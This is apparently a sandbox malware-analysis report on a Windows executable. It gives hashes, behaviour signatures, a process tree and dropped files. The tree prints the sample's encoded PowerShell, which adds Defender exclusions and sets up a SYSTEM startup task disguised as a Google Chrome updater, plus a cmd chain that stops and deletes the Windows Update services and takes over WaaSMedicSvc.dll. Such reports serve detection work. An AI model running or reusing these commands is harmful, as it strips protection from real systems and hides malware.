Overview

overview

10

Static

static

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    53s
  • max time network
    179s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16-08-2022 22:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c462534d4b334e0139a89b83c136511f588bc68927960a591d46830cd3595410.exe

  • Size

    1.8MB

  • MD5

    65acc80d6d495676b55e36561ec35180

  • SHA1

    e66d8f92b5bc2bc7f3c1a466defc29b5a8b9d55f

  • SHA256

    c462534d4b334e0139a89b83c136511f588bc68927960a591d46830cd3595410

  • SHA512

    7b3810cf8102d9494256f450b6e4bc974e0ef0bf779594f1bbf335221979bda389bdaa9751f25c02a85cda02e13b181f57ab441fd82ce4ddb346f07f3b8bccc8

Score
10/10
discoveryevasionexploit

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
    evasion
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 4 IoCs
    exploit
  • Stops running service(s) 3 TTPs
    evasion
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Drops file in System32 directory 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c462534d4b334e0139a89b83c136511f588bc68927960a591d46830cd3595410.exe
    "C:\Users\Admin\AppData\Local\Temp\c462534d4b334e0139a89b83c136511f588bc68927960a591d46830cd3595410.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAcwAjAD4A"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4668
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:2868
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:4264
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:4224
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:3712
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:4452
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        3⤵
        • Modifies registry key
        PID:440
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        3⤵
        • Modifies registry key
        PID:4360
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        3⤵
        • Modifies security service
        • Modifies registry key
        PID:4776
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        3⤵
        • Modifies registry key
        PID:3312
      • C:\Windows\system32\reg.exe
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        3⤵
        • Modifies registry key
        PID:3476
      • C:\Windows\system32\takeown.exe
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:3968
      • C:\Windows\system32\icacls.exe
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:2884
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:3976
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:5056
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:4592
      • C:\Windows\system32\reg.exe
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        3⤵
        • Modifies registry key
        PID:4348
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        3⤵
          PID:4216
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          3⤵
            PID:4516
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
            3⤵
              PID:4440
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
              3⤵
                PID:4420
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                3⤵
                  PID:360
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  3⤵
                    PID:816
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                    3⤵
                      PID:1640
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAcABmACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEgAbwBBAGUAQQBBAGoAQQBEADQAQQBJAEEAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAEwAUQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEARgBBAEEAWQBRAEIAMABBAEcAZwBBAEkAQQBBAG4AQQBFAE0AQQBPAGcAQgBjAEEARgBBAEEAYwBnAEIAdgBBAEcAYwBBAGMAZwBCAGgAQQBHADAAQQBJAEEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEgATQBBAFgAQQBCAEgAQQBHADgAQQBiAHcAQgBuAEEARwB3AEEAWgBRAEIAYwBBAEUATQBBAGEAQQBCAHkAQQBHADgAQQBiAFEAQgBsAEEARgB3AEEAZABRAEIAdwBBAEcAUQBBAFkAUQBCADAAQQBHAFUAQQBjAGcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAHQAQQBGAFkAQQBaAFEAQgB5AEEARwBJAEEASQBBAEIAUwBBAEgAVQBBAGIAZwBCAEIAQQBIAE0AQQBJAEEAQQA4AEEAQwBNAEEAYgB3AEIAcQBBAEMATQBBAFAAZwBBAD0AIgAnACkAIAA8ACMAZgBhAHAAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwB1AHIAeQAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGMAeABmAGIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB1AGgAcQAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMANAA2ADIANQAzADQAZAA0AGIAMwAzADQAZQAwADEAMwA5AGEAOAA5AGIAOAAzAGMAMQAzADYANQAxADEAZgA1ADgAOABiAGMANgA4ADkAMgA3ADkANgAwAGEANQA5ADEAZAA0ADYAOAAzADAAYwBkADMANQA5ADUANAAxADAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBnAGYAaABtACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBsAHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
                    2⤵
                    • Drops file in Program Files directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4988
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHoAeAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbwBqACMAPgA="
                  1⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4352
                  • C:\Program Files\Google\Chrome\updater.exe
                    "C:\Program Files\Google\Chrome\updater.exe"
                    2⤵
                    • Executes dropped EXE
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious use of WriteProcessMemory
                    PID:4396
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAcgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAbwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAcwAjAD4A"
                      3⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4620
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3380
                      • C:\Windows\system32\sc.exe
                        sc stop UsoSvc
                        4⤵
                        • Launches sc.exe
                        PID:4132
                      • C:\Windows\system32\sc.exe
                        sc stop WaaSMedicSvc
                        4⤵
                        • Launches sc.exe
                        PID:1928
                      • C:\Windows\system32\sc.exe
                        sc stop wuauserv
                        4⤵
                        • Launches sc.exe
                        PID:2996
                      • C:\Windows\system32\sc.exe
                        sc stop bits
                        4⤵
                        • Launches sc.exe
                        PID:1860
                      • C:\Windows\system32\sc.exe
                        sc stop dosvc
                        4⤵
                        • Launches sc.exe
                        PID:4272
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                        4⤵
                        • Modifies registry key
                        PID:4864
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                        4⤵
                        • Modifies registry key
                        PID:3908
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                        4⤵
                        • Modifies registry key
                        PID:3712
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                        4⤵
                        • Modifies registry key
                        PID:376
                      • C:\Windows\system32\reg.exe
                        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                        4⤵
                        • Modifies registry key
                        PID:1568
                      • C:\Windows\system32\takeown.exe
                        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                        4⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:4852
                      • C:\Windows\system32\icacls.exe
                        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                        4⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:4780
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:4776
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:3564
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:4960
                      • C:\Windows\system32\reg.exe
                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                        4⤵
                        • Modifies registry key
                        PID:3472
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                        4⤵
                          PID:3556
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                          4⤵
                            PID:4772
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                            4⤵
                              PID:1352
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                              4⤵
                                PID:4240
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                4⤵
                                  PID:4544
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                  4⤵
                                    PID:4568
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                    4⤵
                                      PID:2432

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Program Files\Google\Chrome\updater.exe
                                Filesize

                                1.8MB

                                MD5

                                65acc80d6d495676b55e36561ec35180

                                SHA1

                                e66d8f92b5bc2bc7f3c1a466defc29b5a8b9d55f

                                SHA256

                                c462534d4b334e0139a89b83c136511f588bc68927960a591d46830cd3595410

                                SHA512

                                7b3810cf8102d9494256f450b6e4bc974e0ef0bf779594f1bbf335221979bda389bdaa9751f25c02a85cda02e13b181f57ab441fd82ce4ddb346f07f3b8bccc8

                                Download Submit

                              • C:\Program Files\Google\Chrome\updater.exe
                                Filesize

                                1.8MB

                                MD5

                                65acc80d6d495676b55e36561ec35180

                                SHA1

                                e66d8f92b5bc2bc7f3c1a466defc29b5a8b9d55f

                                SHA256

                                c462534d4b334e0139a89b83c136511f588bc68927960a591d46830cd3595410

                                SHA512

                                7b3810cf8102d9494256f450b6e4bc974e0ef0bf779594f1bbf335221979bda389bdaa9751f25c02a85cda02e13b181f57ab441fd82ce4ddb346f07f3b8bccc8

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize

                                3KB

                                MD5

                                8592ba100a78835a6b94d5949e13dfc1

                                SHA1

                                63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                SHA256

                                fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                SHA512

                                87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                1KB

                                MD5

                                0b5e48498b030d56edc1b71f85dddd63

                                SHA1

                                97807ef78c1fd6624b53cf2125ac63eda99afb1f

                                SHA256

                                e4eccf2b0d851f5305552670b100cfd085398b0d1e8e07babf4c1071e486069d

                                SHA512

                                643d8b5cddc417673df7696517491a2ead6a719a9b99093c733f331cc9b5a540ae82ff975ad79e48b58ef9d01e2a7a14cabc1b1117b890a70a4101a6dee885fc

                                Download Submit

                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize

                                3KB

                                MD5

                                17286868c0a043ae5d2ff5798b6a3163

                                SHA1

                                b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

                                SHA256

                                40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

                                SHA512

                                e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

                                Download Submit

                              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                1KB

                                MD5

                                d0bcbadb3ebcd041605f37019119c0b6

                                SHA1

                                36b16a2b0e025d40ec5a783cf78ad2ff7c38f288

                                SHA256

                                20e15db7d6cf2bca7a2922cc9c4939e643b82beb7378adab586910ceed994a8b

                                SHA512

                                f4fc3762d7d6ffbe10838458d13d6ff3aaa5fdc18e72ecd30697c76c83733d526eb868aa014e404861a6bf8b6881e3cda232f84444b5ba354a390fd87ea3f43a

                                Download Submit

                              • memory/360-234-0x0000000000000000-mapping.dmp

                                Download

                              • memory/376-388-0x0000000000000000-mapping.dmp

                                Download

                              • memory/440-171-0x0000000000000000-mapping.dmp

                                Download

                              • memory/816-240-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1352-399-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1568-389-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1640-241-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1860-383-0x0000000000000000-mapping.dmp

                                Download

                              • memory/1928-381-0x0000000000000000-mapping.dmp

                                Download

                              • memory/2432-403-0x0000000000000000-mapping.dmp

                                Download

                              • memory/2620-119-0x00000000008D0000-0x0000000000AA6000-memory.dmp

                                Filesize

                                1.8MB

                                Download

                              • memory/2868-158-0x0000000000000000-mapping.dmp

                                Download

                              • memory/2884-195-0x0000000000000000-mapping.dmp

                                Download

                              • memory/2996-382-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3312-178-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3380-379-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3472-396-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3476-179-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3556-397-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3564-394-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3712-387-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3712-169-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3908-386-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3968-191-0x0000000000000000-mapping.dmp

                                Download

                              • memory/3976-209-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4132-380-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4180-156-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4216-219-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4224-165-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4240-400-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4264-163-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4272-384-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4348-214-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4360-176-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4396-392-0x0000000001C60000-0x0000000001C72000-memory.dmp

                                Filesize

                                72KB

                                Download

                              • memory/4396-230-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4420-224-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4440-221-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4452-170-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4516-220-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4544-401-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4568-402-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4592-213-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4620-233-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4620-253-0x000001F3770C0000-0x000001F3770DC000-memory.dmp

                                Filesize

                                112KB

                                Download

                              • memory/4620-259-0x000001F3772A0000-0x000001F377359000-memory.dmp

                                Filesize

                                740KB

                                Download

                              • memory/4620-292-0x000001F3770E0000-0x000001F3770EA000-memory.dmp

                                Filesize

                                40KB

                                Download

                              • memory/4668-120-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4668-128-0x00000211609B0000-0x0000021160A26000-memory.dmp

                                Filesize

                                472KB

                                Download

                              • memory/4668-125-0x0000021148680000-0x00000211486A2000-memory.dmp

                                Filesize

                                136KB

                                Download

                              • memory/4772-398-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4776-177-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4776-393-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4780-391-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4852-390-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4864-385-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4960-395-0x0000000000000000-mapping.dmp

                                Download

                              • memory/4988-157-0x0000000000000000-mapping.dmp

                                Download

                              • memory/5056-212-0x0000000000000000-mapping.dmp

                                Download